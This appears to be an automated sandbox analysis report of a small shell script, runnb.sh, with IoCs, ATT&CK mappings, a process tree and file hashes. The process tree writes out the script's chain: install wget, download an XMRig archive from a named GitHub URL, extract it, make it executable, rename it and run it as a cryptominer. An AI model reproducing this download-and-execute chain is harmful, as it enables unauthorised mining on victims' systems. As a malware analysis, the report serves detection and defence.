Analysis
-
max time kernel
217s -
max time network
1792s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240221-en -
resource tags
arch:mipselimage:debian12-mipsel-20240221-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem -
submitted
30-10-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral7
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral8
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/files/fstream-40.dat family_xmrig behavioral2/files/fstream-40.dat xmrig -
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 1140 chmod -
Executes dropped EXE 1 IoCs
Processes:
coolioc pid Process /tmp/xmrig-6.22.0/cool 1142 cool -
OS Credential Dumping 1 TTPs 2 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodpkg-preconfiguredescription ioc Process File opened for reading /etc/shadow sudo File opened for reading /etc/shadow dpkg-preconfigure -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Processes:
aptdescription ioc Process File deleted /var/log/apt/eipp.log.xz apt -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Write file to user bin folder 1 IoCs
Processes:
dpkgdescription ioc Process File opened for modification /usr/bin/wget.dpkg-new dpkg -
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
exim4description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 -
Processes:
aptaptsudodpkgsendmaildpkg-debtardpkghttpdpkgdpkgdpkgdpkgdpkgtarmvdpkgdpkgdpkg-debdpkgdpkgdescription ioc Process File opened for reading /proc/self/fd apt File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/seccomp/actions_avail sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/crypto/fips_enabled http File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/1/limits sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/crypto/fips_enabled apt File opened for reading /proc/sys/kernel/cap_last_cap sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/sys/kernel/ngroups_max apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
dpkg-splitdpkg-splitpid Process 1018 dpkg-split 1018 dpkg-split -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
tarwgetdescription ioc Process File opened for modification /tmp/xmrig-6.22.0/xmrig tar File opened for modification /tmp/xmrigtar.tar.gz wget File opened for modification /tmp/xmrig-6.22.0/SHA256SUMS tar File opened for modification /tmp/xmrig-6.22.0/config.json tar
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:737
-
/usr/bin/sudosudo apt install wget2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:739 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:754 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t637r-0000CA-1Y4⤵
- Reads CPU attributes
PID:775
-
-
-
/usr/bin/aptapt install wget3⤵
- Deletes log files
- Reads runtime system information
PID:761 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:773
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:789
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵PID:896
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Reads runtime system information
PID:897
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"4⤵PID:998
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt5⤵
- OS Credential Dumping
PID:999 -
/usr/local/sbin/localelocale charmap6⤵PID:1002
-
-
/usr/local/bin/localelocale charmap6⤵PID:1002
-
-
/usr/sbin/localelocale charmap6⤵PID:1002
-
-
/usr/bin/localelocale charmap6⤵PID:1002
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1003
-
/usr/bin/sttystty -a7⤵PID:1004
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1005
-
/usr/bin/sttystty -a7⤵PID:1006
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1007
-
/usr/bin/sttystty -a7⤵PID:1008
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1009
-
/usr/bin/sttystty -a7⤵PID:1010
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1011
-
/usr/bin/sttystty -a7⤵PID:1012
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:1013
-
/usr/bin/sttystty -a7⤵PID:1014
-
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch4⤵
- Reads runtime system information
PID:1015
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-protected-field4⤵
- Reads runtime system information
PID:1016
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 17 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb4⤵
- Write file to user bin folder
- Reads runtime system information
PID:1017 -
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb5⤵
- System Network Configuration Discovery
PID:1018
-
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb5⤵
- System Network Configuration Discovery
- Software Deployment Tools
PID:1018
-
-
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb /var/lib/dpkg/tmp.ci5⤵PID:1019
-
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb /var/lib/dpkg/tmp.ci5⤵
- Reads runtime system information
PID:1019 -
/usr/sbin/tartar -x -f - "--warning=no-timestamp"6⤵PID:1022
-
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"6⤵
- Reads runtime system information
PID:1022
-
-
-
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb5⤵PID:1024
-
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb5⤵
- Reads runtime system information
PID:1024
-
-
/usr/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:1028
-
-
/usr/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:1028
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 17 --configure --pending4⤵
- Reads runtime system information
- Software Deployment Tools
PID:1029
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1030
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1031
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1032
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
PID:1033 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1034
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1035
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵
- Writes file to tmp directory
PID:1137
-
-
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1138 -
/usr/local/sbin/gzipgzip -d3⤵PID:1139
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1139
-
-
/usr/sbin/gzipgzip -d3⤵PID:1139
-
-
/usr/bin/gzipgzip -d3⤵PID:1139
-
-
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1140
-
-
/usr/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:1141
-
-
/tmp/xmrig-6.22.0/cool./cool2⤵
- Executes dropped EXE
PID:1142
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5f86e4d6215c1b52f1b5e15fac851f1af
SHA1f04ebc3d33e7478c90d14361dcf262171667eb92
SHA25641e4a1f95364fe8765ba1e22b2af98099216b100f316e05c6b0003cbed043bbe
SHA5124ad0a6ff9f4aad18e843fe95c9cb8f1a5afd3e6ef099f3d2b974f4c490a25ac79f5a86adce2c67adb621d17cd64e25c63cf00de23bec24962c38e12338ccdc22
-
Filesize
150B
MD519f1bb08cf8997837b1f738b76ca97e9
SHA1c497499ad539d6ef580c6c932a2633fe820abded
SHA25699ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa
SHA512fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230
-
Filesize
919B
MD50a9b0011891eae4086d16c3364e772ff
SHA198fe8a7b5b6b0c0aa7635e4e388c67c863772b69
SHA2561aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd
SHA5129e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554
-
Filesize
7.9MB
MD551f989c19819a0a0625c251df6affe95
SHA13b27c895b6f9665f9287510207bfcdcb7fe6e059
SHA256fd11982f252c060a1372e81d5be57589647052b56281a5c54975ca22164f7726
SHA512ec8ce7d1960f9ae564d5654a35e2ad108ed900f3f56b38dfe4601be0db49c1a3cd9c643307b72c2bfc0c157d2640a62343cd7377f68d29327104e0e78b4bdfbd
-
Filesize
3.4MB
MD5ccdb2d76041e107dff38f962d65b3d4b
SHA1e9360c43398f3725b0a3eb87e2448ac416d96be3
SHA25611d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f
SHA512f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d
-
Filesize
956KB
MD5369dd4c115fc9b1b0d96a18cee781ce0
SHA19f4ec68333d0346ec875b9bb2dc5d2d600cd0e33
SHA256882a6bd321139f1a32af88d16a379f5b30076b559f60d4bbc2deb373c77f85bd
SHA512c26aa5b39c865d0d6155be13ac7f59b61c0454784085b4b1260e0edf68dd08d31d34a74054e2d30f93c75a37a0e0873a9b847f3394b4b953071bde5368791834
-
Filesize
6KB
MD523014209f33097c25b5eb8ab6a1fb821
SHA128103432dcf6c21907316831a6e2bd691e48b033
SHA256085282b1fb89bed8fb39aa7e502d20d50da53ead80ed79bd90015b3fa36fdd2e
SHA512f632168daae18f1c46659e9e1d3445bd0c7b57ee4e5b8b2ee222a4e6819ed5ed4542aad654efee3e19ff7951dc0ef0a4f64f09348a8c097849faf7066f3bd901
-
Filesize
571KB
MD51ceec1b20764c1ca617da85ab93fe5d5
SHA1a223a93d3ac2a291c8ac467d7fed29ee1173945f
SHA2563ce8e3f5542c256fd259b50757992b0451727ac88fafd6b007020e1a15b1152e
SHA51244d9d9309f3c29cdc2ba73feaeb30490c2e0b7134f0933dd570ba845306c3937acab1b531d3ed04950721386c08fd4e634539a09a08da0ca849082dce1cb108a
-
Filesize
571KB
MD5248f31becc11cab3983a57424bc1f9a3
SHA1d93c33dfa3173cb9d971cd12ce497de26d81b9a9
SHA2569d8d663e8e82d87b28034eef2afc1c133ef1eea1ebdac360454f406bafd84b0a
SHA512512da9fad7e4674bd38dd36f5811a973ccd6be55553c9138f7b72e6dd0e8658d60011d7085452c127bd7a492af226cb1f63f5320a71a32fe3318cbccfc2e357b
-
Filesize
12B
MD5c0f1f8b1d9f35439a9718a495f7454f8
SHA1d984c94e22944b82e8583e9e9715273e39adf24c
SHA2560664e0947f5b7114c73738ae117752035541360c7056237a2f11a5f89b8d214a
SHA512a1c56a0491e3757606cfb8e1e42fd7ff86fb8ffaa4be40e2cc28ae40568d22d86c84f58332a0a521d725815312b33a166bf6f94ab33b66ae8ecdf4a3a6e23e07
-
Filesize
1KB
MD5264c2bc1637e0e089aa8f2d9feb2a638
SHA1b808b0fac1525f37e3315eb0b431891630f33777
SHA2566b8519ec0247f588d2c7a787af9de44b3b6446d778d54851961902be9834c052
SHA51275ecf45a5d230c5a8b5156097e051bd3f585f619c8a3d6d7728fed729763e203df64098499416e58b4f8a66ed6369d60843514546784cdfb23bd6f6101ea020b
-
Filesize
6KB
MD5eb2b380b9b6231b18e36024122ce8af0
SHA15c14bf54b8e6d5b1309708005cfd22cc30f32f01
SHA25607fae8e74727f90d6de5d9b805d76aa9864ea0d23e84a5a02074732a021a57cd
SHA5121d4a9a5a0b18bbc8a0072587a77af542678993f2661343d24fd03a607bcbdc4b160277fd85d730eb3ffc538c2ceaba1161a3a4d72f9ef60e7b2982310d913ac8
-
Filesize
4KB
MD5f4fb395970bfd87a73045a81626c67ba
SHA174589dd10f8a95ffbae4e957621f59ba1c35b2f4
SHA25613d8f3f758f85794e471e64ef3d26b10201ec0837d94ad18f88810381d30e4ee
SHA512879dc6ccad21ed46eef9b8082574260c4603cbe30651c4843f7646d41927f6a4a4d613bdb142dab46b1d3686bba64602e260c10e1ee7daefa2f0176eec3461e1
-
Filesize
4KB
MD56e5dbfa48f0ea6f309e55fc0428c389d
SHA175c6ed874085a8c48e1fc180f8ba017fa809da73
SHA2568281dba991fde96c73ce19d162389fa295007c50a0438ca0ffefaf6ad1302abe
SHA51270e9c67ab3deb35ade0bdfb8a559629dae21b3e097e3ceb2cbf90e98c8b06660827a8a1d07d7c06f6e565e1db517d73acf89ff38367f05329207e3cb0890295c
-
Filesize
4KB
MD5e9ae680599ed42c2cb1c01fecef9328e
SHA1b4a381c610f1bcb4305f1888ccb897142d8a6fc1
SHA256b91ed1c67daf484869ac22233f2d7af397111c5e23f20836b3c8c59e20f07b2c
SHA51229a3ff5bdd32f93d4e2b512ac60df2f1826004b2a2cdfd4f7779888dcb8f77d937baf1e35b16f158374efb726cde2275d710eab4bdb0aef8c11d043ac4bd2340
-
Filesize
4KB
MD5edae9b7299f2afc09258160786a4dada
SHA1dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA5120e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff
-
Filesize
23KB
MD579c265edb2831f307ba96a10deee8bd0
SHA1c12da23ce05b5c7f009eadc288f2882dd196b74d
SHA2567e6347c6ce002621e81ddb3f4ff24239956d90ca0ccbd005ca4ea69e3f601759
SHA51294121702417e9dcf8ba97f0b40edbdefc70b7db8bf59a442f8cac615d04bf33f0401a0c92db9057880f7fc47d0c2189680235b8890440934a53b97f172b5a622
-
Filesize
858B
MD512b48029c476e2a8669939b9466048ba
SHA18f01f4ddaa12f5242b134325a7fe015edc8b8d8a
SHA2564ed9bd8d6156afd5374f747dd5d08e7a8d65d3f92fb291ed774bcb3d79c808c6
SHA512dafc57b6cd2310ae8f1bf8140c9cf492b8e1a3d4f3fde00dcf9dde4ee274184609b6316efa3687b5ea58b5439ead13401100a547db83400bf1c559a1ff7815b5
-
Filesize
157B
MD5c58683b871dcc2ac83e5f3f2956e93d6
SHA115c07f398bbc6828ccfe46e24da1555ea57ae3b4
SHA256d8baeb39498991340a8ee35f440d637565bbd0fc55e95e22cf51a19d2d3f024d
SHA512cbc3f6445d200ebe32b92211db9794342d65450b79a6dbbc2af7e7968d7c2bf3a12f48958910b28e88e4a4ceaf77f0571ab591b3f23531d9f0e85061a6b76adb
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
1007B
MD5f9cd50e0bd975a42eb66bf9ac82abbbf
SHA1e561c8f5f8ad83f199b526aeb4de36b5357541e4
SHA256ad096afbb161c34d8f406b2e1977b982740276b7d59ee9492c4050070a0ed304
SHA51201d5f05fdd825c5d00e30dd1263a845552f0e50a32a32ef7f89cb9a2be4bd907d1865bb4b5cb151763eb6782e563303666cf1dc36089c848dfe0910d24e73a5a
-
Filesize
89B
MD5dc34a2c0bccf089da7670929b32bf376
SHA108779fdf579872d8a6a480901e15427ed59a9146
SHA256c0eb9c901751308e818fd2bc711f3c50c57c452cb4ba6820632b3b553efb07b5
SHA5122ea8d08540241477bddff5c3d9d45cfa55a3a24d64e3a9d208af3c32c00a3edec3e0ca8f008e915b51d8f5a328175fbbd7bf269835f792cc41dba8e14cc3d356
-
Filesize
288B
MD5f24da3b69b430606fe2d80a6ac662e4b
SHA1e2abddcdb22c30572688045daa81b4df34ba2c4b
SHA256368aadbf11587ada78cbdeb057afb34f2ac77e70a8e3c9ed7c4572f4f7511e4f
SHA51283e8fbaa01d0464940175f5669afc45184e47ffdea37ac8acb04a325b668fe1c034e79a2b3ad7dec592159127e823b4791533cb9059b8180967fdbdf5751295b